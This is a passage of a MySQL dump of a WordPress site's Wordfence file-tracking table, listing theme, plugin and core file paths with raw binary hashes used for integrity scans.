yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('�ўA��2k�����\\��','wp-content/themes/weblog/acmethemes/hooks/excerpts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Q�XZf��h�M','\'��M8(�#ꌒ,�I��	�yj|�R����9�','',0,'?'),('�Ք�,w3�_5�p׿','wp-content/themes/wp-simple/inc/kirki/assets/scss/sections/hover.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�ܞ\\\nowX�D2','��X��\\?!eeO���q�z��ėJD�$O0','',0,'?'),('��.����x�w/S��','wp-content/themes/hitmag/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��I���n���kz�','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('�ڪ`�X���,\nG�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\'�r�(\'���)�','\'Y��t�\0�{T�bsMo�ј��|����','',0,'?'),('���U�N,� \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��n����ŋA�','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('��	s;79 �+k7��','wp-content/themes/the-best/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�f���e����%','-ˁJ%�t�c�>����̺�:u��Ә�I�n�','',0,'?'),('�p�\r&*��J1O�ST','wp-content/themes/graduate/tp-education/tp-single-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�H��4���FY','!�jn��`׬x�/�}i�H�sU���\n� ','',0,'?'),('�!�\0f���T����','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_fixed-width.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�id�4ԙ�6���','R`��;�sR6F�[�#���|#쨧������','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����’�?�@s�ó','aqq�������@.�7T�o=6�\0<��CZ','',0,'?'),('�kW��Z����p}','wp-content/themes/saybusiness/js/owl-carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('���Sf��>�|q{�','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YTЖb�%�����','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('��ža��̎�����','wp-content/themes/catch-responsive/js/catchresponsive-customizer-custom-scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C:�c��i�1�','r�cKIҭ����r��y�G,�==�㬆t0t�)','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��!\nUX1��!,���','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-alpha-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��-*!�\r$�����','@?�Q0{�0������M<���$�i��','',0,'?'),('����VC?]T��I�\n}','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/serialize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R�Mя��\0�T�','��D��~��E4^J1�g�zh�\0~�R$5g�_�','',0,'?'),('���E\0��*��\r�y7','wp-content/themes/edge/page-templates/frontpage-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#L#���2�W#g-�!','F�Y��z�-Nm��W&��a�OF�\ZP�0^�r�a','',0,'?'),('��3y����{-���/�','wp-content/themes/catch-responsive/images/gallery/slider2-1200x514.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��Л�b~\"�W� )','��e��n����N����y��8�^RkE�˦','',0,'?'),('��_ �_p�}bpf͈�','wp-content/themes/enigma/images/Comingsoon.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� KRb!���`n�Dz�J','��|�3��s�k���=��`��ki}�tn�otW','',0,'?'),('�Ͱ�o�z:��6�Y��B','wp-content/themes/quicksand/js/lightgallery/js/lightgallery-all.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�T?n�_ܠG�Ѯ�','``s�bruポ�Q�����9�u�q�r� K�^M','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('��hKd}W>�����{�','wp-content/themes/enigma/core/lang/ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�i,��Cr�fY','B��l��D�Bc�<>�W�I8L�|^�NyT�l','',0,'?'),('��Ƞ\">�gݠ���','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�*�;��8I�w�\ZA�','�st4�ݎ%�o�@L��I�ߟ�u�\Z�\\o�8�D','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('��s=(���㚗r��Y*','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/stylus/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yB�9��q~�L��Zݽ�','�ٶiщ���AX��`���\n��DeӔ�ռM','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�\Z[�p6�@4{��B','wp-content/themes/newsmag/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��]�ٝA+y�R�','�\n��4r�7�iL��ؠ̹i;�gvW�O�mJ1','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�(�=}��{�S�8','wp-content/themes/saybusiness/inc/upsell/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j�X����Ŕ/','�\0��Y窼�2���=�W&>,[sAtG=K^�D�','',0,'?'),('�.Z��	��ޜ[��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FbE�O�R(V�k��Q','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('�Iְ����3�]p�','wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5��I����R�','~�i���v�:I*1��,�:��qM(\"W� 8��','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)���8 <�67�#\Z�','��]>y-�f�\"�Ny%\r�l��r`������','',0,'?'),('�O�E7(jlK�wFݴMb','wp-content/themes/saybusiness/inc/page-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�8Ir�@R4���','wI.��ۈ��#��þ�\'؞6�\'C��/ʌf�','',0,'?'),('�TD�{�i�˳֓��*�','wp-content/themes/advance/inc/kirki/assets/scss/controls/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dY	ږ�`���s#P','�e��7n�!� f��D\Zh\'�J6SJo�1�','',0,'?'),('�Z�@����E�ya�B','wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R��s�x���*%�','�pЎ��(�W�\\���	�c�36�\0��\'�f�','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�_�x���O�/;	\\','wp-content/themes/enigma/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�X:���,��?c�*','�mqy�HQH�8����*Bߗ�z�pyO.K\n���','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('�e���0�S�hF��y','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^=\nm< ��\ne�<j�n','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('�uR�&�|\\!E�L�&','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/lint',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IﳡG�g�V�A�Jִ','�4}����Z2�!�|~T#�z�)�4!����&AQE�','',0,'?'),('�v���]ʓg�[<�ͻ�','wp-content/themes/advance/js/advance-preloder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','왑�e{ED�7;#','���-}��z��!>�-h �f�-K�\"d+�','',0,'?'),('�~�H�&�r/�ע��','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�q~t\\m9:?Z�','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('����Cs1���j','wp-content/themes/Yegor/search.php',0,'��z�jS[�T��-','��z�jS[�T��-','.N4Ӛ\\\0�?|�o����C�FX;K	�}','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T%��dx�P7��/�','����{���]�[mX1!u������n�2f�','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]5�g��-M���','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��.yz�_��jz�|�','wp-content/themes/twentynineteen/images/pattern_03.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Y)f�x��:.+��','4]ou�\'�u�����mN��ZV;Ke��jW>T','',0,'?'),('��qp{�-K�r��/','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/edit/closebrackets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��x�\n3Z9Z�',')�5y�u���{=�.�qJ\\u�Z��/!I���@','',0,'?'),('������/��>~K��\Z�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/sql/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ko\n*B��6�pw��','s)>�r��\"�?!ؑ-��֏��A��P���}�','',0,'?'),('���[����K�Um+�','wp-content/themes/authorize/components/post/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;כ�\n\Z��A��C\n��','P�Hפ2X����8f@�Fj�\\��J�����+','',0,'?'),('��ӑ�?���=�','wp-includes/block-patterns/heading-paragraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('��j�+�$��6�h','wp-content/themes/wp-simple/inc/kirki/assets/js/functions/validate-css-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|=do$/r�b˖�s','�}� E��gv<�3HI.Qaq�������zU','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?');
INSERT INTO `wp_wffilemods` VALUES ('��ҐAP���u7�2�Y?','wp-content/themes/quicksand/js/lg-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A`)4��[ϻ��','�򃰼�d�S�!y_o�U�ܡ����!wᇧ��','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��n�!\r�lWq�Z','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.node.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯ�~=�*^Yj�:s','��{г%�����	�\Z�~c�$���Zi�','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-�	�o�=��8,;h�\'LFR#�ʜB','',0,'?'),('���dd�f�<��!�','wp-content/themes/graduate/inc/tp-education.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g����^x���','����#���)�������uJ��.��A\\��','',0,'?'),('�����[ia3\\\r�_�p','wp-content/themes/Endolf/FT/plugin/options-framework/js/options-custom.js',0,'=�u�v����\nd��','=�u�v����\nd��','/���!���w�+�Č	cc\\�֎8�a0J�P<D','',0,'?'),('����d�7�?KgK`ns�','wp-content/themes/edge/js/jquery.cycle.all.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS\"‰B�ƒn�','�띗�l)�i<UH�n\"�����!����[�/xZ�','',0,'?'),('�<�@���y�^�','wp-content/themes/enigma/images/Scorline.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y#3��ߐ�ܻ�Z��','ي�ޕ\r�����i��nI�˛���>\'��FL�','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�$=Z��Z�Hɼ���f','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������;Y�lE�','�_��E>���@��[)�$�=�A�L�	C�Mp�','',0,'?'),('�$lv��EC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC��B����I�mU','���z�jy�I���`F�����.\rCC!qc_','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ�	#��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�<Ƈk]�W�h4c�','wp-content/themes/edge/js/source/jquery.cycle.all.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0S�f�Y�(��T�','��B�ŸY���]x&��A����_�3��&���V>','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v	��~�%W\Z���','',0,'?'),('�E��k�c�~K�}zܿ�','wp-content/themes/wp-simple/inc/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���t�ݜ�\0JM�i','ɭ�K�����b$z_r$��x	���>D����','',0,'?'),('�Q�*%_�7�L�9U^��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/xml-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��̵��_7����C�','S��d\r��x�i�Q]\\��mG-\\�ޘ�:�','',0,'?'),('�XUT1eSAJ�\n3ϝ3','wp-content/themes/enigma/css/media-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F��	v��� �>�','�\0e+�B+�-��sp�����R\Z�ð�/�|�','',0,'?'),('�^��\'{ϧ}P~��','wp-content/themes/city-store/assets/js/jquery.cycle.all.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS\"‰B�ƒn�','�띗�l)�i<UH�n\"�����!����[�/xZ�','',0,'?'),('�^��n�elD/��:�','wp-content/themes/wp-simple/inc/kirki/includes/lib/class-kirki-colourlovers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>w��,�_�o�\'F','�%�,7�	�8�<������j��JV��7�U�','',0,'?'),('�b�E��3�g\'cZ (��','wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӵ��q��\'7��\0�Y>�','���x����[�%�����@��c����','',0,'?'),('�}����!J���G^7','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�}�u�O�ҭ��G\'','wp-content/themes/gambit/inc/customizer/sections/customizer-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gBn��z��E','Ra%�I��1S��?Dg�倢�ŏ�	Rj','',0,'?'),('��\'� T�a��ɪ��w','wp-content/themes/Yegor/js/mobilemenu.js',0,'kI�~�9f�e2tց','kI�~�9f�e2tց','4�����U�N�����v�5?��[���	��m��','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ	8P','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('���`�29fD�K���[','wp-content/themes/wp-simple/inc/kirki/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w7E�@��%C.ۆwI','ǕI{�+$�`o�	�>�C�M�[\0B�\Z8y�','',0,'?'),('��N�v�E�Q����4�','wp-content/themes/advance/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Il�1є��?�','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('����]��E�HaɊ�','wp-content/themes/hitmag/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}4��!��zt�Z','�r�\'�=oübk�A`�?��r�>F����','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۶8��BZ�y��-',']�~*%6�r�+�q�.a�V�s!���Ysk����','',0,'?'),('����>�5�b�@r�\\��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sno��P��/���',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('���<�	�f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';b�`u����h\'���y','��Z�C��#�9�8H����<��h�,d��2','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('��Ж�\\��H�&!4�]','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/coffeescript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ި{�Lf���v�G�','OVt J(ׁ�s�;�K�{�㺋s�ɡ,e#_}� ','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('�ڥvS�5@���ꪡ��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K.���\0KL�5�=','�h\Z_���Х_<��r�+j\\���; ��','',0,'?'),('�ḽ3�\0��XZ�<�\Z','wp-content/themes/hitmag/inc/customizer/assets/imgs/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` �0�V}���I1�L�','�B2CI�D�#PF^��&�p����u7�����;','',0,'?'),('��g��0�=�]$��AF','wp-content/themes/saybusiness/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~H�ڸ0�b5c','�<T ����ߗ�QE!��f�(����?�S���','',0,'?'),('��Ÿ�K��ECʁ\"','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��������ܵ&�','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('�\n��n�=�^�n�N','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:L��?�m&�','8uv��ߜ����_�0-��锴񢷧U�2','',0,'?'),('�\r�B��J�DI��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/stylus/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��[Dʍ<v�\0����','�ٶiщ���AX��`���\n��DeӔ�ռM','',0,'?'),('����\ZǷ��,_Z��','wp-content/themes/simpleshift/inc/kirki/includes/sections/class-kirki-sections-default-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�U����c�A��(��','(�PE(�v����a�M��~u5a-`��','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��r�`3�U�$�n��','���B:���BA��xd]��Y�<#�p��8u','',0,'?'),('�+�xђ��\'u|�Q3�/','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/bin/lint',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IﳡG�g�V�A�Jִ','�4}����Z2�!�|~T#�z�)�4!����&AQE�','',0,'?'),('�/a��4��ϧ�9�6','wp-content/themes/enigma/footer-callout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C����m�	rJ�=n','n���z2�j�?�CtG�t2��\0C}ED�Z','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iŮ�9�e`��2�','Z���M�GXL;$xMi|Q�%���ŽY2��$_','',0,'?'),('�P\'i2�+(����7�+T','wp-content/themes/hitmag/template-parts/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9K1�>R���%^','Y�o��T���L�ρ����55)%?��ݍ`z=�','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�n��-���i�\0\0ʐ�','wp-content/themes/simpleshift/inc/kirki/includes/output/field/class-kirki-output-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�^7�c�����[�L�','�����3�K��3\Z�%��l�U�x2ˋ=2�','',0,'?'),('�qâ�h���/� �','wp-content/themes/newsmag/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z2D�ku���g467�','�J��4��(K��m�˸�YLQm>g\r�~3�','',0,'?'),('�r�E�%�H!��<�)','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_flat_10_000000_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#��<��>/^|x','�jn�N\r�����+\r\Zd\'Ρ�b�Y�,Јg�','',0,'?'),('�y�\Z�����\Z�','wp-content/themes/saybusiness/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����fg�o�����|','�Ġ�Y��.H�>\'�b\r�)N���$&ݟ<�','',0,'?'),('�{آp?8۸��Q��','wp-content/themes/enigma/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\\s�FEn���	�','cg���B�\n_�ę� 